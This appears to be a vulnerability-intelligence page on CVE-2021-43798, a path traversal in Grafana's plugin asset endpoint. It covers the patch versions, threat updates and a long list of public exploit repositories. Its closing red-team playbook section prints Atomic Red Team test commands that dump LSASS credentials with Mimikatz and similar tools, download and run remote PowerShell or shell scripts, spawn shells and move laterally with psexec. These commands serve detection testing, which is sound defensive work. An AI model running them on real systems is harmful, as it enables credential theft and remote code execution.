CVE-2021-43798
Overview
This vulnerability is a directory traversal flaw in Grafana's plugin public assets endpoint. It arises from insufficient sanitization of the plugin ID parameter in the URL path, allowing crafted requests to traverse directories on the server filesystem. The affected component is the HTTP handler serving files under the /public/plugins/ path in Grafana versions 8.0.0-beta1 through 8.3.0 prior to patching.
Vulnerability Description
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
Impact
An unauthenticated attacker can exploit this flaw to read arbitrary files on the Grafana server, potentially exposing sensitive configuration files, credentials, or other data stored locally. No user interaction or privileges are required to trigger the vulnerability. Exposure of sensitive files can facilitate further attacks such as credential theft, unauthorized access, or lateral movement within the network, impacting confidentiality and operational security of the affected environment.
Solution
Users must upgrade Grafana to one of the patched versions: 8.0.7, 8.1.8, 8.2.7, or 8.3.1 as detailed in the Grafana GitHub Security Advisory GHSA-8pjx-jj86-j47p. The advisory and patch commits are available at https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p and https://github.com/grafana/grafana/commit/c798c0e958d15d9cc7f27c72113d572fa58545ce. No alternative mitigations are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Grafana platform is characterized by a directory traversal flaw that affects specific versions of the software, allowing unauthorized access to local files on the server. This issue arises from improper validation of user input in the URL path, specifically when accessing installed plugins through the endpoint `<grafana_host_url>/public/plugins//`. By manipulating the URL, an attacker can traverse the directory structure of the server, potentially exposing sensitive files that should not be accessible. The flaw is present in Grafana versions 8.0.0-beta1 through 8.3.0, excluding the patched versions, which underscores the importance of maintaining updated software to mitigate such risks.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious request to the vulnerable URL, leveraging the directory traversal capability to access files outside the intended directory. For instance, an attacker might attempt to retrieve configuration files, logs, or other sensitive information that could aid in further attacks or provide insights into the internal workings of the Grafana instance. This type of attack can be executed remotely, making it particularly concerning for organizations that may not have stringent access controls or monitoring in place.
The real-world impact of this vulnerability can be significant, especially for organizations relying on Grafana for monitoring and observability. Access to sensitive files could lead to data breaches, exposing confidential information that could be used for malicious purposes. Furthermore, the unauthorized retrieval of configuration files could allow attackers to gain insights into the system architecture, potentially leading to more sophisticated attacks. The business risk is compounded by the potential for reputational damage, regulatory fines, and loss of customer trust, particularly if sensitive data is compromised.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched versions of Grafana, specifically 8.0.7, 8.1.8, 8.2.7, or 8.3.1. Regularly updating software is a fundamental practice in cybersecurity, as it helps close known vulnerabilities. Additionally, implementing robust access controls and monitoring mechanisms can help detect unauthorized access attempts. Organizations should also consider employing web application firewalls (WAFs) to filter and monitor HTTP requests, which can provide an additional layer of security against such exploitation attempts. Conducting regular security assessments and penetration testing can further enhance an organization's ability to identify and remediate vulnerabilities proactively.
In conclusion, the directory traversal vulnerability in Grafana highlights the critical need for vigilance in software management and security practices. The potential for exploitation poses significant risks to organizations, making it imperative to adopt a proactive approach to vulnerability management. By staying informed about vulnerabilities, implementing timely updates, and employing comprehensive security measures, organizations can better protect their systems and sensitive data from malicious actors.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-43798, evidenced by the emergence of new proof-of-concept tools on public repositories. This increase in exploit availability correlates with a sharp rise in detection activity across our sensors, indicating that threat actors are actively leveraging the directory traversal vulnerability in Grafana versions prior to the patched releases. Although the EPSS score remains stable at a high level, the broadened dissemination of exploit code lowers the barrier for less sophisticated attackers to conduct unauthorized file access, thereby expanding the threat landscape. This development elevates the urgency for defenders to recognize the heightened risk of compromise through this vector, as opportunistic exploitation is likely to become more widespread. Consequently, the threat level associated with CVE-2021-43798 should be considered elevated due to increased exploitation potential and active adversary interest.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2021-43798, accompanied by the emergence of several new proof-of-concept exploit tools publicly available on code-sharing platforms. This proliferation of accessible exploit code has notably lowered the technical barrier for threat actors, enabling a broader spectrum of attackers—including less skilled opportunists—to conduct unauthorized file access against vulnerable Grafana instances. Our telemetry indicates that exploitation activity has intensified sharply, signaling increased adversary interest and operationalization of this vulnerability beyond initial discovery phases. Although the EPSS score remains stable at a high level, the expanded exploit landscape and surge in detection activity collectively elevate the risk of compromise. Defenders should recognize that the threat environment surrounding CVE-2021-43798 has become more dynamic and aggressive, warranting heightened vigilance despite the availability of patched versions. The overall threat level is thus assessed as elevated due to the combination of increased exploitation attempts and wider dissemination of effective attack tools.
Update 3 — June 15, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-43798, accompanied by the emergence of additional proof-of-concept tools that automate and simplify the exploitation process. This development indicates that threat actors are increasingly leveraging publicly available resources to conduct unauthenticated directory traversal attacks against vulnerable Grafana instances. Although the EPSS score shows a slight decline, the surge in telemetry activity and expanded exploit toolkit suggest a more aggressive and accessible threat environment. For defenders, this shift underscores the heightened likelihood of opportunistic attacks exploiting this vulnerability, particularly in environments where patching has not been consistently applied. Consequently, the overall threat level for CVE-2021-43798 is elevated, reflecting an increased risk of compromise driven by broader attacker engagement and improved exploitation capabilities.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Grafana | Grafana | All |
cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
|
|
|
Grafana | Grafana | All |
cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
|
|
|
Grafana | Grafana | All |
cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
|
|
|
Grafana | Grafana | 8.0.0 |
cpe:2.3:a:grafana:grafana:8.0.0:beta1:*:*:*:*:*:*
|
|
|
Grafana | Grafana | 8.0.0 |
cpe:2.3:a:grafana:grafana:8.0.0:beta2:*:*:*:*:*:*
|
|
|
Grafana | Grafana | 8.0.0 |
cpe:2.3:a:grafana:grafana:8.0.0:beta3:*:*:*:*:*:*
|
|
|
Grafana | Grafana | 8.3.0 |
cpe:2.3:a:grafana:grafana:8.3.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Grafana Plugin Path Traversal
auxiliary/scanner/http/grafana_plugin_traversal
|
h00die, jordyv | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Grafana 8.3.0 - Directory Traversal and Arbitrary File Read | s1gh | webapps | multiple | - | View |
GitHub PoCs (63)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
jas502n/Grafana-CVE-2021-43798
Grafana Unauthorized arbitrary file reading vulnerability
|
jas502n | 369 | 85 | 2021-12-07 | View |
|
A-D-Team/grafanaExp
A exploit tool for Grafana Unauthorized arbitrary file reading vulnerability (CVE-2021-43798), it can burst plugins / ex...
|
A-D-Team | 270 | 32 | 2021-12-07 | View |
|
pedrohavay/exploit-grafana-CVE-2021-43798
This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).
|
pedrohavay | 46 | 12 | 2021-12-11 | View |
|
taythebot/CVE-2021-43798
CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)
|
taythebot | 43 | 8 | 2021-12-06 | View |
|
zer0yu/CVE-2021-43798
Grafana Arbitrary File Reading Vulnerability
|
zer0yu | 27 | 6 | 2021-12-07 | View |
|
Mr-xn/CVE-2021-43798
CVE-2021-43798:Grafana 任意文件读取漏洞
|
Mr-xn | 24 | 6 | 2021-12-07 | View |
|
ScorpionsMAX/CVE-2021-43798-Grafana-POC
CVE-2021-43798 Grafana 任意文件读取漏洞 POC+参数
|
ScorpionsMAX | 14 | 4 | 2021-12-07 | View |
|
MoCh3n/CVE-2021-43798-grafana_fileread
grafana CVE-2021-43798任意文件读取漏洞POC,采用多插件轮训检测的方法,允许指定单URL和从文件中读取URL
|
MoCh3n | 17 | 1 | 2021-12-08 | View |
|
asaotomo/CVE-2021-43798-Grafana-Exp
Grafanav8.*版本任意文件读取漏洞批量检测工具:该漏洞目前为0day漏洞,未授权的攻击者利用该漏洞,能够获取服务器敏感文件。
|
asaotomo | 12 | 4 | 2021-12-07 | View |
|
Sic4rio/Grafana-Decryptor-for-CVE-2021-43798
Grafana Decryptor for CVE-2021-43798
|
Sic4rio | 8 | 5 | 2024-07-02 | View |
|
Mo0ns/Grafana_POC-CVE-2021-43798
Grafana-POC任意文件读取漏洞(CVE-2021-43798)
|
Mo0ns | 9 | 1 | 2021-12-09 | View |
|
z3n70/CVE-2021-43798
Simple program for exploit grafana
|
z3n70 | 5 | 3 | 2021-12-09 | View |
|
kenuosec/grafanaExp
利用grafan CVE-2021-43798任意文件读漏洞,自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件,并输出data_sourrce信息。
|
kenuosec | 6 | 0 | 2021-12-07 | View |
|
rodpwn/CVE-2021-43798-mass_scanner
|
rodpwn | 5 | 0 | 2022-01-08 | View |
|
K3ysTr0K3R/CVE-2021-43798-EXPLOIT
A PoC exploit for CVE-2021-43798 - Grafana Directory Traversal
|
K3ysTr0K3R | 4 | 1 | 2024-03-04 | View |
|
wezoomagency/GrafXploit
Automated Exploit Tool for Grafana CVE-2021-43798: Scanning common files that contain juicy informations and extracting ...
|
wezoomagency | 4 | 0 | 2024-12-14 | View |
|
Jroo1053/GrafanaDirInclusion
Script to demonstrate the Grafana directory traversal exploit (CVE-2021-43798).
|
Jroo1053 | 1 | 3 | 2022-02-25 | View |
|
s1gh/CVE-2021-43798
|
s1gh | 4 | 0 | 2021-12-08 | View |
|
rnsss/CVE-2021-43798-poc
Grafana8.x 任意文件读取
|
rnsss | 0 | 3 | 2022-01-06 | View |
|
hupe1980/CVE-2021-43798
Grafana - Directory Traversal and Arbitrary File Read
|
hupe1980 | 3 | 0 | 2022-10-08 | View |
|
Ryze-T/CVE-2021-43798
Grafana8.x 任意文件读取
|
Ryze-T | 2 | 1 | 2021-12-14 | View |
|
0xSAZZAD/Grafana-CVE-2021-43798
Python implementation of a tool for decrypting and encrypting sensitive data in Grafana, specifically addressing the vul...
|
0xSAZZAD | 3 | 0 | 2024-10-05 | View |
|
fanygit/Grafana-CVE-2021-43798Exp
CVE-2021-43798Exp多线程批量验证脚本
|
fanygit | 2 | 1 | 2021-12-09 | View |
|
aymenbouferroum/CVE-2021-43798_exploit
|
aymenbouferroum | 1 | 1 | 2022-01-18 | View |
|
lfz97/CVE-2021-43798-Grafana-File-Read
CVE-2021-43798-Grafana任意文件读取漏洞
|
lfz97 | 1 | 1 | 2021-12-08 | View |
|
FAOG99/GrafanaDirectoryScanner
Exploit for grafana CVE-2021-43798
|
FAOG99 | 1 | 1 | 2023-05-12 | View |
|
monke443/CVE-2021-43798
Arbitrary file read in Grafana allows an attacker to read server files by abusing a path traversal.
|
monke443 | 2 | 0 | 2025-03-06 | View |
|
BJLIYANLIANG/CVE-2021-43798-Grafana-File-Read
|
BJLIYANLIANG | 0 | 1 | 2022-03-28 | View |
|
Strikoder-Premium/Grafana-Password-Decryptor
Python toolkit for decrypting AES-256 and cracking PBKDF2 passwords from Grafana databases usually paired with (CVE-2021...
|
Strikoder-Premium | 1 | 0 | 2025-12-22 | View |
|
STK-Security/Grafana-Password-Decryptor
Python toolkit for decrypting AES-256 and cracking PBKDF2 passwords from Grafana databases usually paired with (CVE-2021...
|
STK-Security | 1 | 0 | 2025-12-22 | View |
|
LongWayHomie/CVE-2021-43798
CVE-2021-43798 is a vulnerability marked as High priority (CVSS 7.5) leading to arbitrary file read via installed plugin...
|
LongWayHomie | 1 | 0 | 2021-12-11 | View |
|
k3rwin/CVE-2021-43798-Grafana
CVE-2021-43798 Grafana任意文件读取
|
k3rwin | 1 | 0 | 2021-12-17 | View |
|
wagneralves/CVE-2021-43798
Directory Traversal and Arbitrary File Read on Grafana
|
wagneralves | 1 | 0 | 2023-12-21 | View |
|
halencarjunior/grafana-CVE-2021-43798
|
halencarjunior | 0 | 1 | 2021-12-21 | View |
|
strikoder/Grafana-Password-Decryptor
Python toolkit for decrypting AES-256 and cracking PBKDF2 passwords from Grafana databases usually paired with (CVE-2021...
|
strikoder | 1 | 0 | 2025-12-22 | View |
|
lalkaltest/CVE-2021-43798
|
lalkaltest | 0 | 0 | 2022-06-02 | View |
|
yasindce1998/grafana-cve-2021-43798
This repository contains files for reproducing the vulnerability.
|
yasindce1998 | 0 | 0 | 2022-03-03 | View |
|
Bouquets-ai/CVE-2021-43798
运用golang写的grafana批量验证脚本,内置48个验证
|
Bouquets-ai | 0 | 0 | 2022-01-06 | View |
|
manfredgabriel/cve-2021-43798-lab
|
manfredgabriel | 0 | 0 | 2026-07-24 | View |
|
sbimoxa/cve-2021-43798-lab
|
sbimoxa | 0 | 0 | 2026-07-24 | View |
|
Lim-ahmin/CVE-2021-43798
|
Lim-ahmin | 0 | 0 | 2026-07-11 | View |
|
Okymi-X/CVE-2021-43798
|
Okymi-X | 0 | 0 | 2026-06-02 | View |
|
Asbawy/GrafTraverse-CVE-2021-43798
CVE-2021-43798 MiNi Exploitation Framework
|
Asbawy | 0 | 0 | 2026-05-26 | View |
|
kikechans/-Grafana-LFI-CVE-2021-43798
📂 Grafana LFI Exploit (CVE-2021-43798). Extracción automatizada de credenciales y configuración. 🕵️
|
kikechans | 0 | 0 | 2026-04-02 | View |
|
ticofookfook/CVE-2021-43798
|
ticofookfook | 0 | 0 | 2024-03-27 | View |
|
ravi5hanka/CVE-2021-43798-Exploit-for-Windows-and-Linux
Modified exploit for CVE-2021-43798 compatible with both Windows and Linux hosts.
|
ravi5hanka | 0 | 0 | 2025-02-12 | View |
|
abuyazeen/CVE-2021-43798-Grafana-path-traversal-tester
Automated path traversal testing tool for Grafana plugin endpoints using curl and Bash.
|
abuyazeen | 0 | 0 | 2025-05-19 | View |
|
0xf3d0rq/CVE-2021-43798
CVE-2021-43798 is a high-severity path traversal vulnerability (CVSS 3.1 score: 7.5) affecting Grafana versions 8.0.0-be...
|
0xf3d0rq | 0 | 0 | 2025-11-27 | View |
|
baktistr/cve-2021-43798-enum
CVE-2021-4379 Enumeration Tools
|
baktistr | 0 | 0 | 2026-01-08 | View |
|
mauricelambert/LabAutomationCVE-2021-43798
This script implements a lab automation where I exploit CVE-2021-43798 to steal user secrets and then gain privileges on...
|
mauricelambert | 0 | 0 | 2023-01-28 | View |
|
victorhorowitz/grafana-exploit-CVE-2021-43798
|
victorhorowitz | 0 | 0 | 2023-09-03 | View |
|
katseyres2/CVE-2021-43798
|
katseyres2 | 0 | 0 | 2023-10-26 | View |
|
notbside/CVE-2021-43798-PoC
Simple and effective PoC for CVE-2021-43798 Grafana Path Traversal
|
notbside | 0 | 0 | 2026-01-27 | View |
|
Shoxake17/CVE-2021-43798
By PrivacyHunter
|
Shoxake17 | 0 | 0 | 2026-03-22 | View |
|
kikechans/Grafana-LFI-Exploit-CVE-2021-43798-
|
kikechans | 0 | 0 | 2026-04-02 | View |
|
suljov/Grafana-LFI-exploit
Updated exploit script for the CVE-2021-43798
|
suljov | 0 | 0 | 2025-04-27 | View |
|
G01d3nW01f/CVE-2021-43798
|
G01d3nW01f | 0 | 0 | 2023-01-09 | View |
|
Iris288/CVE-2021-43798
|
Iris288 | 0 | 0 | 2023-11-21 | View |
|
JiuBanSec/Grafana-CVE-2021-43798
Grafana File-Read Vuln
|
JiuBanSec | 0 | 0 | 2021-12-08 | View |
|
gixxyboy/CVE-2021-43798
|
gixxyboy | 0 | 0 | 2021-12-12 | View |
|
MalekAlthubiany/CVE-2021-43798
|
MalekAlthubiany | 0 | 0 | 2024-06-19 | View |
|
hxlxmj/Grafxploit
Automated Exploit Tool for Grafana CVE-2021-43798: Scanning common files that contain juicy informations and extracting ...
|
hxlxmj | 0 | 0 | 2024-07-22 | View |
|
davidrxchester/Grafana-8.3-Directory-Traversal
CVE-2021-43798 working exploit
|
davidrxchester | 0 | 0 | 2025-01-26 | View |
Threat Feed
24 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
